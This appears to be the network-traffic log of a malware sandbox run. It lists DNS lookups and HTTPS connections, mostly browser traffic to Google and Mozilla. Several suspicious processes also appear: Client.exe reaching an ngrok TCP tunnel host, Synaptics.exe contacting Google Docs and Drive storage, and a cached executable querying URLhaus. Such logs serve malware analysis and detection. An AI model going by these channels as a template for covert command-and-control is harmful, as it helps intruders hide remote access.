216.58.201.106

216.58.212.202

172.217.169.74

172.217.169.42

172.217.169.10

172.217.16.234

142.250.187.234

142.250.200.10

142.250.200.42

216.58.204.74

142.250.187.202
142.250.187.196:443

www.google.com

https

chrome.exe

3.0kB
11.5kB
7
15
142.250.187.196:443

www.google.com

https

chrome.exe

8.5kB
39.5kB
38
49
142.250.200.46:443

workspace.google.com

https

chrome.exe

8.5kB
42.5kB
58
66
142.250.200.33:443

lh3.googleusercontent.com

https

chrome.exe

13.0kB
629.3kB
124
513
142.250.178.8:443

ssl.google-analytics.com

https

chrome.exe

2.8kB
7.2kB
7
11
8.8.8.8:53

46.200.250.142.in-addr.arpa

dns

NetworkService

146 B
224 B
2
2

DNS Request

46.200.250.142.in-addr.arpa

DNS Request

46.200.250.142.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

NetworkService

222 B
324 B
3
3

DNS Request

227.187.250.142.in-addr.arpa

DNS Request

region1.google-analytics.com

DNS Response

216.239.34.36

216.239.32.36

DNS Request

region1.google-analytics.com

DNS Response

216.239.32.36

216.239.34.36
8.8.8.8:53

251.179.250.142.in-addr.arpa

dns

NetworkService

222 B
339 B
3
3

DNS Request

251.179.250.142.in-addr.arpa

DNS Request

202.187.250.142.in-addr.arpa

DNS Request

202.187.250.142.in-addr.arpa
8.8.8.8:53

72.204.58.216.in-addr.arpa

dns

NetworkService

266 B
475 B
4
4

DNS Request

72.204.58.216.in-addr.arpa

DNS Request

8.178.250.142.in-addr.arpa

DNS Request

apis.google.com

DNS Response

142.250.178.14

DNS Request

apis.google.com

DNS Response

142.250.178.14
142.250.178.14:443

apis.google.com

https

chrome.exe

17.4kB
541.1kB
116
448
8.8.8.8:53

feedback-pa.clients6.google.com

dns

firefox.exe

154 B
186 B
2
2

DNS Request

feedback-pa.clients6.google.com

DNS Request

feedback-pa.clients6.google.com

DNS Response

142.250.200.10

DNS Response

142.250.200.10
142.250.200.10:443

feedback-pa.clients6.google.com

https

chrome.exe

7.9kB
9.3kB
16
17
8.8.8.8:53

14.200.250.142.in-addr.arpa

dns

NetworkService

215 B
199 B
3
2

DNS Request

14.200.250.142.in-addr.arpa

DNS Request

ade.googlesyndication.com

DNS Response

216.58.204.66

DNS Request

ade.googlesyndication.com
8.8.8.8:53

14.178.250.142.in-addr.arpa

dns

NetworkService

569 B
871 B
8
8

DNS Request

14.178.250.142.in-addr.arpa

DNS Request

66.204.58.216.in-addr.arpa

DNS Request

ssl.gstatic.com

DNS Response

142.250.200.3

DNS Request

drive-thirdparty.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

94.1.102.66.in-addr.arpa

DNS Request

clients6.google.com

DNS Response

142.250.187.238

DNS Request

waa-pa.clients6.google.com

DNS Response

142.250.187.202

DNS Request

waa-pa.clients6.google.com

DNS Response

142.250.180.10
8.8.8.8:53

36.34.239.216.in-addr.arpa

dns

NetworkService

286 B
468 B
4
4

DNS Request

36.34.239.216.in-addr.arpa

DNS Request

accounts.youtube.com

DNS Response

142.250.178.14

DNS Request

238.179.250.142.in-addr.arpa

DNS Request

238.179.250.142.in-addr.arpa
8.8.8.8:53

10.200.250.142.in-addr.arpa

dns

NetworkService

268 B
437 B
4
4

DNS Request

10.200.250.142.in-addr.arpa

DNS Request

play.google.com

DNS Response

142.250.179.238

DNS Request

accounts.google.co.uk

DNS Request

accounts.google.co.uk

DNS Response

66.102.1.94

DNS Response

66.102.1.94
172.217.169.78:443

drive.google.com

https

chrome.exe

62.9kB
2.9MB
466
2392
216.239.34.36:443

region1.google-analytics.com

https

chrome.exe

2.9kB
6.5kB
5
8
142.251.173.84:443

accounts.google.com

https

chrome.exe

25.1kB
239.6kB
120
246
216.58.204.66:443

ade.googlesyndication.com

https

chrome.exe

1.6kB
6.5kB
4
8
142.250.187.202:443

waa-pa.clients6.google.com

https

chrome.exe

4.4kB
8.6kB
17
20
142.250.179.238:443

play.google.com

https

chrome.exe

203.0kB
22.4MB
2214
17854
8.8.8.8:53

lh3.google.com

dns

firefox.exe

120 B
192 B
2
2

DNS Request

lh3.google.com

DNS Response

216.58.212.238

DNS Request

lh3.google.com

DNS Response

216.58.212.238
8.8.8.8:53

3.200.250.142.in-addr.arpa

dns

NetworkService

292 B
546 B
4
4

DNS Request

3.200.250.142.in-addr.arpa

DNS Request

ogads-pa.clients6.google.com

DNS Response

216.58.201.106

DNS Request

106.201.58.216.in-addr.arpa

DNS Request

106.201.58.216.in-addr.arpa
8.8.8.8:53

238.212.58.216.in-addr.arpa

dns

NetworkService

146 B
346 B
2
2

DNS Request

238.212.58.216.in-addr.arpa

DNS Request

238.212.58.216.in-addr.arpa
142.250.200.3:443

ssl.gstatic.com

https

chrome.exe

10.9kB
267.2kB
107
250
216.58.201.106:443

ogads-pa.clients6.google.com

https

chrome.exe

5.5kB
8.2kB
10
12
142.250.187.238:443

clients6.google.com

https

chrome.exe

10.3kB
304.1kB
79
260
142.250.187.202:443

waa-pa.clients6.google.com

https

chrome.exe

8.8kB
44.1kB
27
44
8.8.8.8:53

drivefrontend-pa.clients6.google.com

dns

firefox.exe

391 B
471 B
5
5

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

216.58.204.74

DNS Request

people-pa.clients6.google.com

DNS Response

142.250.200.10

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

142.250.187.234

DNS Request

addons-pa.clients6.google.com

DNS Request

addons-pa.clients6.google.com

DNS Response

216.58.204.74

DNS Response

142.250.179.234
142.250.179.238:443

play.google.com

https

chrome.exe

3.3kB
7.1kB
7
10
142.250.187.202:443

waa-pa.clients6.google.com

https

chrome.exe

2.9kB
7.0kB
5
8
142.250.187.234:443

appsgrowthpromo-pa.clients6.google.com

https

chrome.exe

7.5kB
10.5kB
16
18
8.8.8.8:53

youtube.googleapis.com

dns

firefox.exe

136 B
632 B
2
2

DNS Request

youtube.googleapis.com

DNS Response

142.250.200.42

216.58.212.234

142.250.178.10

216.58.213.10

142.250.179.234

142.250.187.202

172.217.169.74

216.58.212.202

142.250.187.234

172.217.169.42

142.250.200.10

172.217.16.234

216.58.201.106

216.58.204.74

142.250.180.10

DNS Request

youtube.googleapis.com

DNS Response

142.250.187.202

172.217.16.234

142.250.200.42

142.250.187.234

142.250.179.234

216.58.212.202

216.58.213.10

172.217.169.10

172.217.169.42

142.250.180.10

216.58.201.106

172.217.169.74

216.58.204.74

142.250.200.10

216.58.212.234

142.250.178.10
142.250.187.238:443

clients6.google.com

https

chrome.exe

2.9kB
7.1kB
5
8
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

191 B
281 B
3
3

DNS Request

docs.google.com

DNS Response

142.250.179.238

DNS Request

contacts.google.com

DNS Request

contacts.google.com

DNS Response

142.250.178.14

DNS Response

142.250.178.14
8.8.8.8:53

ogs.google.com

dns

firefox.exe

120 B
194 B
2
2

DNS Request

ogs.google.com

DNS Response

142.250.178.14

DNS Request

ogs.google.com

DNS Response

142.250.178.14
8.8.8.8:53

signaler-pa.clients6.google.com

dns

chrome.exe

154 B
186 B
2
2

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.178.10

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.178.10
8.8.8.8:53

10.178.250.142.in-addr.arpa

dns

NetworkService

146 B
224 B
2
2

DNS Request

10.178.250.142.in-addr.arpa

DNS Request

10.178.250.142.in-addr.arpa
142.250.178.10:443

signaler-pa.clients6.google.com

https

chrome.exe

9.0kB
12.7kB
38
52
142.250.178.10:443

signaler-pa.clients6.google.com

https

chrome.exe

4.2kB
7.7kB
15
17
8.8.8.8:53

0.tcp.in.ngrok.io

dns

Client.exe

126 B
158 B
2
2

DNS Request

0.tcp.in.ngrok.io

DNS Request

0.tcp.in.ngrok.io

DNS Response

3.108.97.190

DNS Response

13.127.206.16
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

122 B
154 B
2
2

DNS Request

docs.google.com

DNS Request

docs.google.com

DNS Response

142.250.179.238

DNS Response

142.250.179.238
8.8.8.8:53

o.pki.goog

dns

Synaptics.exe

112 B
214 B
2
2

DNS Request

o.pki.goog

DNS Request

o.pki.goog

DNS Response

142.250.178.3

DNS Response

142.250.178.3
8.8.8.8:53

drive.usercontent.google.com

dns

Synaptics.exe

148 B
180 B
2
2

DNS Request

drive.usercontent.google.com

DNS Request

drive.usercontent.google.com

DNS Response

216.58.212.193

DNS Response

216.58.212.193
8.8.8.8:53

193.212.58.216.in-addr.arpa

dns

NetworkService

146 B
342 B
2
2

DNS Request

193.212.58.216.in-addr.arpa

DNS Request

193.212.58.216.in-addr.arpa
8.8.8.8:53

21.236.111.52.in-addr.arpa

dns

NetworkService

144 B
316 B
2
2

DNS Request

21.236.111.52.in-addr.arpa

DNS Request

21.236.111.52.in-addr.arpa
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

124 B
334 B
2
2

DNS Request

urlhaus.abuse.ch

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.2.49

151.101.66.49

151.101.194.49

151.101.130.49

DNS Response

151.101.66.49

151.101.130.49

151.101.194.49

151.101.2.49
8.8.8.8:53

49.2.101.151.in-addr.arpa

dns

NetworkService

142 B
262 B
2
2

DNS Request

49.2.101.151.in-addr.arpa

DNS Request

49.2.101.151.in-addr.arpa
8.8.8.8:53

beacons.gcp.gvt2.com

dns

chrome.exe

132 B
224 B
2
2

DNS Request

beacons.gcp.gvt2.com

DNS Request

beacons.gcp.gvt2.com

DNS Response

142.250.179.163

DNS Response

142.250.179.163
8.8.8.8:53

163.179.250.142.in-addr.arpa

dns

NetworkService

186 B
256 B
3
3

DNS Request

163.179.250.142.in-addr.arpa

DNS Request

google.com

DNS Request

google.com

DNS Response

142.250.180.14

DNS Response

142.250.180.14
142.250.179.163:443

beacons.gcp.gvt2.com

https

chrome.exe

8.4kB
8.7kB
34
36
142.251.173.84:443

accounts.google.com

https

chrome.exe

3.3kB
7.8kB
8
11
8.8.8.8:53

e2c48.gcp.gvt2.com

dns

chrome.exe

128 B
160 B
2
2

DNS Request

e2c48.gcp.gvt2.com

DNS Request

e2c48.gcp.gvt2.com

DNS Response

35.206.35.210

DNS Response

35.206.35.210
8.8.8.8:53

14.180.250.142.in-addr.arpa

dns

NetworkService

197 B
268 B
3
3

DNS Request

14.180.250.142.in-addr.arpa

DNS Request

beacons.gvt2.com

DNS Request

beacons.gvt2.com

DNS Response

142.250.179.163

DNS Response

142.250.179.163
8.8.8.8:53

210.35.206.35.in-addr.arpa

dns

NetworkService

144 B
248 B
2
2

DNS Request

210.35.206.35.in-addr.arpa

DNS Request

210.35.206.35.in-addr.arpa
8.8.8.8:53

google.co.uk

dns

chrome.exe

116 B
148 B
2
2

DNS Request

google.co.uk

DNS Request

google.co.uk

DNS Response

172.217.169.3

DNS Response

172.217.169.3
8.8.8.8:53

e2c46.gcp.gvt2.com

dns

chrome.exe

128 B
160 B
2
2

DNS Request

e2c46.gcp.gvt2.com

DNS Request

e2c46.gcp.gvt2.com

DNS Response

35.215.235.162

DNS Response

35.215.235.162
8.8.8.8:53

e2c1.gcp.gvt2.com

dns

chrome.exe

126 B
158 B
2
2

DNS Request

e2c1.gcp.gvt2.com

DNS Request

e2c1.gcp.gvt2.com

DNS Response

34.80.89.126

DNS Response

34.80.89.126
8.8.8.8:53

3.169.217.172.in-addr.arpa

dns

NetworkService

218 B
362 B
3
3

DNS Request

3.169.217.172.in-addr.arpa

DNS Request

162.235.215.35.in-addr.arpa

DNS Request

162.235.215.35.in-addr.arpa
8.8.8.8:53

126.89.80.34.in-addr.arpa

dns

NetworkService

142 B
244 B
2
2

DNS Request

126.89.80.34.in-addr.arpa

DNS Request

126.89.80.34.in-addr.arpa
172.217.169.78:443

drive.google.com

https

chrome.exe

76.2kB
19.1kB
85
65
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

344 B
647 B
5
5

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.130.49

151.101.2.49

151.101.194.49

151.101.66.49

DNS Request

49.130.101.151.in-addr.arpa

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.127.206.16

DNS Request

42.192.213.154.in-addr.arpa

DNS Request

42.192.213.154.in-addr.arpa
142.250.178.10:443

signaler-pa.clients6.google.com

https

chrome.exe

2.3kB
7.4kB
8
11
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

130 B
262 B
2
2

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

firefox.exe

158 B
320 B
2
2

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1

DNS Response

34.149.97.1
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

246 B
448 B
3
3

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

300 B
372 B
3
3

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

309 B
381 B
3
3

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

firefox.exe

1.8kB
4.4kB
5
7
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

204 B
422 B
3
3

DNS Request

shavar.prod.mozaws.net

DNS Response

52.41.23.50

44.235.50.64

44.233.129.8

DNS Request

shavar.prod.mozaws.net

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

274 B
541 B
3
3

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

212 B
244 B
2
2

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

246 B
461 B
3
3

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

50.23.41.52.in-addr.arpa

DNS Request

50.23.41.52.in-addr.arpa
8.8.8.8:53

1.97.149.34.in-addr.arpa

dns

NetworkService

140 B
240 B
2
2

DNS Request

1.97.149.34.in-addr.arpa

DNS Request

1.97.149.34.in-addr.arpa
8.8.8.8:53

beacons.gcp.gvt2.com

dns

chrome.exe

190 B
268 B
3
3

DNS Request

beacons.gcp.gvt2.com

DNS Response

142.250.187.195

DNS Request

drive.google.com

DNS Response

172.217.169.78

DNS Request

drive.google.com

DNS Response

172.217.169.78
8.8.8.8:53

drive.google.com

dns

firefox.exe

124 B
180 B
2
2

DNS Request

drive.google.com

DNS Request

drive.google.com

DNS Response

2a00:1450:4009:819::200e

DNS Response

2a00:1450:4009:819::200e
172.217.169.78:443

drive.google.com

https

firefox.exe

180.1kB
2.9MB
374
2196
8.8.8.8:53

accounts.google.com

dns

chrome.exe

130 B
162 B
2
2

DNS Request

accounts.google.com

DNS Request

accounts.google.com

DNS Response

142.251.173.84

DNS Response

142.251.173.84
8.8.8.8:53

accounts.google.com

dns

chrome.exe

130 B
186 B
2
2

DNS Request

accounts.google.com

DNS Request

accounts.google.com

DNS Response

2a00:1450:400c:c1f::54

DNS Response

2a00:1450:400c:c1f::54
142.251.173.84:443

accounts.google.com

https

firefox.exe

29.5kB
241.4kB
82
242
8.8.8.8:53

www.google.com

dns

firefox.exe

120 B
152 B
2
2

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

142.250.187.196

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

120 B
176 B
2
2

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004

DNS Response

2a00:1450:4009:81f::2004
142.250.187.196:443

www.google.com

https

firefox.exe

6.3kB
35.9kB
17
36
8.8.8.8:53

workspace.google.com

dns

firefox.exe

132 B
164 B
2
2

DNS Request

workspace.google.com

DNS Request

workspace.google.com

DNS Response

142.250.200.46

DNS Response

142.250.200.46
8.8.8.8:53

workspace.google.com

dns

firefox.exe

132 B
188 B
2
2

DNS Request

workspace.google.com

DNS Request

workspace.google.com

DNS Response

2a00:1450:4009:823::200e

DNS Response

2a00:1450:4009:823::200e
142.250.200.46:443

workspace.google.com

https

firefox.exe

15.3kB
55.3kB
59
89
8.8.8.8:53

lh3.googleusercontent.com

dns

firefox.exe

203 B
280 B
3
3

DNS Request

lh3.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

fonts.googleapis.com

DNS Response

216.58.204.74

DNS Request

fonts.googleapis.com

DNS Response

216.58.204.74
8.8.8.8:53

googlehosted.l.googleusercontent.com

dns

firefox.exe

164 B
196 B
2
2

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

142.250.200.33
8.8.8.8:53

googlehosted.l.googleusercontent.com

dns

firefox.exe

164 B
220 B
2
2

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

2a00:1450:4009:823::2001

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

2a00:1450:4009:823::2001
142.250.200.33:443

googlehosted.l.googleusercontent.com

https

firefox.exe

9.7kB
344.3kB
70
264
8.8.8.8:53

storage.googleapis.com

dns

firefox.exe

136 B
616 B
2
2

DNS Request

storage.googleapis.com

DNS Request

storage.googleapis.com

DNS Response

142.250.200.27

172.217.169.27

142.250.200.59

172.217.169.91

216.58.212.251

142.250.179.251

216.58.201.123

142.250.187.219

172.217.16.251

216.58.213.27

216.58.204.91

142.250.180.27

142.250.187.251

142.250.178.27

216.58.212.219

DNS Response

216.58.212.251

216.58.212.219

172.217.169.27

142.250.178.27

142.250.179.251

142.250.200.59

142.250.187.219

172.217.169.91

142.250.200.27

216.58.204.91

172.217.16.251

142.250.187.251

216.58.213.27

142.250.180.27

216.58.201.123
8.8.8.8:53

storage.googleapis.com

dns

firefox.exe

136 B
360 B
2
2

DNS Request

storage.googleapis.com

DNS Response

2a00:1450:4009:81d::201b

2a00:1450:4009:81e::201b

2a00:1450:4009:820::201b

2a00:1450:4009:81f::201b

DNS Request

storage.googleapis.com

DNS Response

2a00:1450:4009:81d::201b

2a00:1450:4009:81f::201b

2a00:1450:4009:81e::201b

2a00:1450:4009:820::201b
142.250.200.27:443

storage.googleapis.com

https

firefox.exe

2.5kB
8.3kB
15
12
8.8.8.8:53

ssl.google-analytics.com

dns

firefox.exe

140 B
172 B
2
2

DNS Request

ssl.google-analytics.com

DNS Request

ssl.google-analytics.com

DNS Response

142.250.178.8

DNS Response

142.250.187.232
8.8.8.8:53

ssl.google-analytics.com

dns

firefox.exe

140 B
196 B
2
2

DNS Request

ssl.google-analytics.com

DNS Response

2a00:1450:4009:81e::2008

DNS Request

ssl.google-analytics.com

DNS Response

2a00:1450:4009:81e::2008
142.250.178.8:443

ssl.google-analytics.com

https

firefox.exe

2.8kB
8.0kB
8
10
8.8.8.8:53

region1.analytics.google.com

dns

firefox.exe

148 B
212 B
2
2

DNS Request

region1.analytics.google.com

DNS Response

216.239.34.36

216.239.32.36

DNS Request

region1.analytics.google.com

DNS Response

216.239.34.36

216.239.32.36
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

138 B
266 B
2
2

DNS Request

stats.g.doubleclick.net

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.184.157

64.233.184.155

64.233.184.156

64.233.184.154

DNS Response

64.233.184.157

64.233.184.156

64.233.184.154

64.233.184.155
8.8.8.8:53

www.google.co.uk

dns

firefox.exe

124 B
156 B
2
2

DNS Request

www.google.co.uk

DNS Request

www.google.co.uk

DNS Response

172.217.169.3

DNS Response

172.217.169.3
8.8.8.8:53

region1.analytics.google.com

dns

firefox.exe

148 B
212 B
2
2

DNS Request

region1.analytics.google.com

DNS Response

216.239.34.36

216.239.32.36

DNS Request

region1.analytics.google.com

DNS Response

216.239.34.36

216.239.32.36
8.8.8.8:53

www.google.co.uk

dns

firefox.exe

186 B
258 B
3
3

DNS Request

www.google.co.uk

DNS Response

172.217.169.3

DNS Request

www.google.co.uk

DNS Response

2a00:1450:4009:817::2003

DNS Request

www.google.co.uk

DNS Response

2a00:1450:4009:817::2003
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

138 B
266 B
2
2

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.184.155

64.233.184.157

64.233.184.154

64.233.184.156

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.184.157

64.233.184.154

64.233.184.155

64.233.184.156
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

138 B
362 B
2
2

DNS Request

stats.g.doubleclick.net

DNS Response

2a00:1450:400c:c0b::9a

2a00:1450:400c:c0b::9b

2a00:1450:400c:c0b::9c

2a00:1450:400c:c0b::9d

DNS Request

stats.g.doubleclick.net

DNS Response

2a00:1450:400c:c0b::9c

2a00:1450:400c:c0b::9b

2a00:1450:400c:c0b::9a

2a00:1450:400c:c0b::9d
8.8.8.8:53

region1.analytics.google.com

dns

firefox.exe

148 B
260 B
2
2

DNS Request

region1.analytics.google.com

DNS Response

2001:4860:4802:34::36

2001:4860:4802:32::36

DNS Request

region1.analytics.google.com

DNS Response

2001:4860:4802:32::36

2001:4860:4802:34::36
172.217.169.3:443

www.google.co.uk

https

firefox.exe

1.9kB
6.7kB
7
8
216.239.34.36:443

region1.analytics.google.com

https

firefox.exe

3.2kB
8.0kB
8
11
64.233.184.157:443

stats.g.doubleclick.net

https

firefox.exe

1.9kB
7.0kB
7
9
8.8.8.8:53

apis.google.com

dns

firefox.exe

122 B
196 B
2
2

DNS Request

apis.google.com

DNS Response

142.250.178.14

DNS Request

apis.google.com

DNS Response

142.250.178.14
8.8.8.8:53

plus.l.google.com

dns

firefox.exe

126 B
158 B
2
2

DNS Request

plus.l.google.com

DNS Response

142.250.178.14

DNS Request

plus.l.google.com

DNS Response

142.250.178.14
8.8.8.8:53

plus.l.google.com

dns

firefox.exe

410 B
582 B
6
6

DNS Request

plus.l.google.com

DNS Response

2a00:1450:4009:815::200e

DNS Request

feedback-pa.clients6.google.com

DNS Response

142.250.200.42

DNS Request

42.200.250.142.in-addr.arpa

DNS Request

ade.googlesyndication.com

DNS Request

www3.l.google.com

DNS Response

142.250.178.14

DNS Request

www3.l.google.com

DNS Response

142.250.178.14
8.8.8.8:53

157.184.233.64.in-addr.arpa

dns

NetworkService

353 B
519 B
5
5

DNS Request

157.184.233.64.in-addr.arpa

DNS Request

feedback-pa.clients6.google.com

DNS Response

2a00:1450:4009:817::200a

DNS Request

ade.googlesyndication.com

DNS Response

216.58.204.66

DNS Request

accounts.youtube.com

DNS Response

142.250.178.14

DNS Request

accounts.youtube.com

DNS Response

142.250.178.14
142.250.178.14:443

accounts.youtube.com

https

firefox.exe

36.1kB
703.7kB
132
547
142.250.200.42:443

feedback-pa.clients6.google.com

https

firefox.exe

4.0kB
13.5kB
15
18
216.58.204.66:443

ade.googlesyndication.com

https

firefox.exe

2.0kB
7.0kB
8
9
8.8.8.8:53

www3.l.google.com

dns

firefox.exe

246 B
346 B
4
4

DNS Request

www3.l.google.com

DNS Response

2a00:1450:4009:815::200e

DNS Request

play.google.com

DNS Response

142.250.179.238

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e
142.250.178.14:443

accounts.youtube.com

https

firefox.exe

2.2kB
9.4kB
10
11
142.250.179.238:443

play.google.com

https

firefox.exe

57.0kB
26.8kB
91
77
142.250.178.14:443

accounts.youtube.com

https

firefox.exe

1.9kB
9.3kB
7
10
8.8.8.8:53

accounts.google.co.uk

dns

firefox.exe

134 B
248 B
2
2

DNS Request

accounts.google.co.uk

DNS Response

66.102.1.94

DNS Request

accounts.google.co.uk

DNS Response

66.102.1.94
8.8.8.8:53

accounts-cctld.l.google.com

dns

firefox.exe

219 B
291 B
3
3

DNS Request

accounts-cctld.l.google.com

DNS Response

66.102.1.94

DNS Request

accounts-cctld.l.google.com

DNS Response

2a00:1450:400c:c06::5e

DNS Request

accounts-cctld.l.google.com

DNS Response

2a00:1450:400c:c06::5e
66.102.1.94:443

accounts-cctld.l.google.com

https

firefox.exe

1.9kB
6.7kB
7
8
8.8.8.8:53

ssl.gstatic.com

dns

firefox.exe

246 B
346 B
4
4

DNS Request

ssl.gstatic.com

DNS Response

142.250.200.3

DNS Request

ssl.gstatic.com

DNS Response

2a00:1450:4009:822::2003

DNS Request

lh2.l.google.com

DNS Request

lh2.l.google.com

DNS Response

2a00:1450:4009:80b::200e

DNS Response

2a00:1450:4009:80b::200e
8.8.8.8:53

lh3.google.com

dns

firefox.exe

184 B
174 B
3
2

DNS Request

lh3.google.com

DNS Response

216.58.212.238

DNS Request

lh2.l.google.com

DNS Response

216.58.212.238

DNS Request

lh2.l.google.com
142.250.200.3:443

ssl.gstatic.com

https

firefox.exe

7.5kB
180.2kB
56
159
216.58.212.238:443

lh2.l.google.com

https

firefox.exe

1.9kB
9.3kB
7
10
8.8.8.8:53

drive-thirdparty.googleusercontent.com

dns

firefox.exe

281 B
398 B
4
4

DNS Request

drive-thirdparty.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

clients6.google.com

DNS Response

142.250.187.238

DNS Request

clients.l.google.com

DNS Request

clients.l.google.com

DNS Response

142.250.187.238

DNS Response

142.250.187.238
142.250.200.33:443

drive-thirdparty.googleusercontent.com

https

firefox.exe

2.2kB
12.1kB
10
13
8.8.8.8:53

ogads-pa.clients6.google.com

dns

firefox.exe

148 B
180 B
2
2

DNS Request

ogads-pa.clients6.google.com

DNS Response

216.58.201.106

DNS Request

ogads-pa.clients6.google.com

DNS Response

142.250.178.10
8.8.8.8:53

waa-pa.clients6.google.com

dns

firefox.exe

216 B
288 B
3
3

DNS Request

waa-pa.clients6.google.com

DNS Response

142.250.178.10

DNS Request

waa-pa.clients6.google.com

DNS Response

2a00:1450:4009:823::200a

DNS Request

waa-pa.clients6.google.com

DNS Response

2a00:1450:4009:81d::200a
8.8.8.8:53

clients.l.google.com

dns

firefox.exe

214 B
298 B
3
3

DNS Request

clients.l.google.com

DNS Response

2a00:1450:4009:820::200e

DNS Request

ogads-pa.clients6.google.com

DNS Response

2a00:1450:4009:820::200a

DNS Request

ogads-pa.clients6.google.com

DNS Response

2a00:1450:4009:80b::200a
142.250.178.10:443

waa-pa.clients6.google.com

https

firefox.exe

6.0kB
14.0kB
11
16
142.250.187.238:443

clients.l.google.com

https

firefox.exe

9.7kB
294.3kB
59
236
216.58.201.106:443

ogads-pa.clients6.google.com

https

firefox.exe

2.0kB
12.5kB
9
12
8.8.8.8:53

drivefrontend-pa.clients6.google.com

dns

firefox.exe

164 B
196 B
2
2

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

142.250.187.202

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

142.250.200.42
8.8.8.8:53

drivefrontend-pa.clients6.google.com

dns

firefox.exe

164 B
220 B
2
2

DNS Request

drivefrontend-pa.clients6.google.com

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

2a00:1450:4009:827::200a

DNS Response

2a00:1450:4009:827::200a
8.8.8.8:53

people-pa.clients6.google.com

dns

firefox.exe

457 B
661 B
6
6

DNS Request

people-pa.clients6.google.com

DNS Response

142.250.187.202

DNS Request

people-pa.clients6.google.com

DNS Response

2a00:1450:4009:827::200a

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

2a00:1450:4009:815::200a

DNS Request

202.212.58.216.in-addr.arpa

DNS Request

addons-pa.clients6.google.com

DNS Response

142.250.180.10

DNS Request

addons-pa.clients6.google.com

DNS Response

142.250.180.10
8.8.8.8:53

appsgrowthpromo-pa.clients6.google.com

dns

firefox.exe

168 B
200 B
2
2

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

216.58.212.202

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

142.250.179.234
142.250.187.202:443

people-pa.clients6.google.com

https

firefox.exe

64.4kB
54.9kB
101
114
142.250.187.202:443

people-pa.clients6.google.com

https

firefox.exe

2.1kB
12.6kB
9
13
216.58.212.202:443

appsgrowthpromo-pa.clients6.google.com

https

firefox.exe

1.9kB
12.5kB
7
12
142.250.178.10:443

waa-pa.clients6.google.com

https

firefox.exe

1.9kB
12.5kB
7
12
8.8.8.8:53

addons-pa.clients6.google.com

dns

firefox.exe

150 B
206 B
2
2

DNS Request

addons-pa.clients6.google.com

DNS Request

addons-pa.clients6.google.com

DNS Response

2a00:1450:4009:80b::200a

